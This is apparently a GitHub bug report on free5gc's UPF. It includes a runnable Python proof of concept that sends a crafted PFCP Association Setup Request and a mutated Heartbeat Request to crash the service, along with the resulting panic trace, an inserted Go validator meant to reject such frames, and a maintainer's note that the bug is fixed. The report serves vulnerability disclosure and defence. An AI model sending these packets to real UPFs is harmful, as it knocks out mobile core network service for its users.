
[Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes #496

Closed
tjbdlq opened this issue Oct 24, 2023 · 1 comment

Comments


tjbdlq commented Oct 24, 2023

[Bugs] UPF crash caused by malformed PFCP message whose Sequence Number is mutated to overflow bytes

Describe the bug

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when sending a malformed PFCP Heartbeat Request whose Sequence Number is mutated to overflow bytes (e.g. 0xFF 0xFF 0xFF 0xFF). This could cause DoS of any UPF instance; all memory issues due to this kind of PFCP message are caught by the Go memory runtime, which would cause a panic and crash.

To Reproduce

Steps to reproduce the behavior:

  1. Build the UPF with source code
  2. Run the bin/upf with default config/upfcfg.yaml
  3. Run the following POC python script
```python
#!/usr/bin/env python3

import socket

udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.settimeout(1.0)

# PFCP Association Setup Request (message type 5), sent first so the UPF
# accepts the sending node as a CP peer
pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00'

# PFCP Heartbeat Request (message type 1) with the bytes after the Sequence
# Number mutated to 0xFF; this is the datagram that triggers the panic
pfcp_heartbeat_request = b'\x20\x01\x00\x0f\x00\x00\x00\xff\xff\xff\x00\x00\x60\x00\x04\xe8\x1f\xdc\x30'

udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805))
try:
    udp_socket.recv(65535)
except Exception as exception:
    print(f"Receive failed: {exception}")

udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805))
try:
    udp_socket.recv(65535)
except Exception as exception:
    print(f"Receive failed: {exception}")

udp_socket.close()
```

Expected behavior

Anyone could leverage this to cause DoS and resource consumption against a pool of UPFs. As much as possible, check the total length of PFCP messages, update the handling logic, or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of the free5gc UPF.

Screenshots

No special screenshot is provided.

Environment (please complete the following information):

  • free5GC Version: v3.3.0
  • OS: Ubuntu 20.04
  • Kernel version: 5.4.5-050405-generic
  • go version: go1.21.1 linux/amd64

Trace File

Configuration File

No specific configuration is required.

PCAP File

No specific pcap file is provided.

Log File

2023-10-24T17:49:15.614745280+08:00 [INFO][UPF][CFG] ==================================================
2023-10-24T17:49:15.614761831+08:00 [INFO][UPF][Main] Log level is set to [info]
2023-10-24T17:49:15.614777264+08:00 [INFO][UPF][Main] Report Caller is set to [false]
2023-10-24T17:49:15.614837834+08:00 [INFO][UPF][Main] starting Gtpu Forwarder [gtp5g]
2023-10-24T17:49:15.614864772+08:00 [INFO][UPF][Main] GTP Address: "127.0.0.8:2152"
2023-10-24T17:49:15.650332227+08:00 [INFO][UPF][BUFF] buff netlink server started
2023-10-24T17:49:15.650439249+08:00 [INFO][UPF][Perio] perio server started
2023-10-24T17:49:15.650444691+08:00 [INFO][UPF][Gtp5g] Forwarder started
2023-10-24T17:49:15.652112097+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] starting pfcp server
2023-10-24T17:49:15.652132290+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] pfcp server started
2023-10-24T17:49:15.652138607+08:00 [INFO][UPF][Main] UPF started
2023-10-24T17:50:42.343823681+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805] handleAssociationSetupRequest
2023-10-24T17:50:42.343962121+08:00 [INFO][UPF][PFCP][LAddr:127.0.0.8:8805][CPNodeID:10.100.200.100] New node
2023-10-24T17:50:42.347048969+08:00 [FATA][UPF][PFCP][LAddr:127.0.0.8:8805] panic: runtime error: slice bounds out of range [6:4]
goroutine 10 [running]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:24 +0x65
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main.func1()
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x5d
panic({0x860400, 0xc000490210})
	/usr/local/go/src/runtime/panic.go:1038 +0x215
github.com/wmnsk/go-pfcp/ie.(*IE).UnmarshalBinary(0x10000c0000cbb30, {0xc000490200, 0x20, 0x30})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:371 +0x1a5
github.com/wmnsk/go-pfcp/ie.Parse({0xc000490200, 0xb, 0xb})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:339 +0x48
github.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc000490200, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:632 +0x8c
github.com/wmnsk/go-pfcp/message.(*HeartbeatRequest).UnmarshalBinary(0xc000096720, {0xc0004901f8, 0x0, 0xadaa82a41536e5d2})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0x6e
github.com/wmnsk/go-pfcp/message.Parse({0xc0004901f8, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x3ab
github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main(0xc000400a90, 0xc0004030d0)
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x4ce
created by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).Start
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xd2
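A framing check added here as an example, in Go because go-upf is a Go project; it is not code from go-upf or go-pfcp. It walks the PFCP header and the IE TLVs of the PoC datagrams before any IE is decoded, so the mutated Heartbeat Request is rejected with an error instead of reaching the parser. Reading the trace, the `[6:4]` panic is consistent with the mutated bytes at offset 8 forming a vendor-specific IE (type 0xFFFF, length 0) whose decoder assumes a 2-byte Enterprise ID; that reading, and the well-formed heartbeat bytes, are my assumptions.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// Datagrams constructed from the issue's PoC bytes: the mutated Heartbeat Request, the
// Association Setup Request, and a well-formed Heartbeat (Recovery Time Stamp IE only).
var (
	malformedHeartbeat = []byte{0x20, 0x01, 0x00, 0x0f, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff,
		0x00, 0x00, 0x60, 0x00, 0x04, 0xe8, 0x1f, 0xdc, 0x30}
	associationSetupRequest = []byte{0x20, 0x05, 0x00, 0x1f, 0x00, 0x00, 0x01, 0x00,
		0x00, 0x3c, 0x00, 0x05, 0x00, 0x0a, 0x64, 0xc8, 0x64, 0x00, 0x60, 0x00, 0x04,
		0xe8, 0x1f, 0xdc, 0x30, 0x00, 0x2b, 0x00, 0x06, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00}
	wellFormedHeartbeat = []byte{0x20, 0x01, 0x00, 0x0c, 0x00, 0x00, 0x01, 0x00,
		0x00, 0x60, 0x00, 0x04, 0xe8, 0x1f, 0xdc, 0x30}
)
// ValidatePFCP checks framing only (header length vs datagram size, SEID flag, IE TLV
// bounds). It never indexes past len(b), so a bad frame yields an error, not a panic.
func ValidatePFCP(b []byte) error {
	off := 8 // header: flags, type, length, 3-byte sequence number, spare byte
	if len(b) > 0 && b[0]&0x01 == 1 {
		off = 16 // S flag set: an 8-byte SEID precedes the sequence number
	}
	if len(b) < off {
		return fmt.Errorf("datagram shorter than its %d-byte PFCP header", off)
	}
	if msgLen := int(binary.BigEndian.Uint16(b[2:4])); msgLen+4 != len(b) {
		return fmt.Errorf("length field %d disagrees with datagram size %d", msgLen, len(b)-4)
	}
	for off < len(b) {
		if len(b)-off < 4 {
			return fmt.Errorf("truncated IE header at offset %d", off)
		}
		typ := binary.BigEndian.Uint16(b[off : off+2])
		l := int(binary.BigEndian.Uint16(b[off+2 : off+4]))
		if l > len(b)-off-4 {
			return fmt.Errorf("IE type %d declares %d bytes but only %d remain", typ, l, len(b)-off-4)
		}
		// Vendor-specific IEs (type high bit set) carry a 2-byte Enterprise ID before the
		// payload; length < 2 is the shape that makes an unchecked parser slice [6:4].
		if typ&0x8000 != 0 && l < 2 {
			return fmt.Errorf("vendor-specific IE %#x has length %d, no room for an Enterprise ID", typ, l)
		}
		off += 4 + l
	}
	return nil
}
```

Run the check on every datagram before handing it to the message parser; anything that returns an error can be dropped and counted, which is the "check the total length or just drop them" mitigation the report asks for.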
tjbdlq changed the title from "[Bugs] UPF crash caused by malformed PFCP Heartbeat Request message whose Sequence Number is mutated to overflow bytes" to "[Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes" on Oct 25, 2023
brianchennn (Contributor) commented:

@tjbdlq
This issue has been fixed in upf commit: free5gc/go-upf@78a6a67

go-pfcp v0.0.22 has fixed the malformed PFCP messages handling.
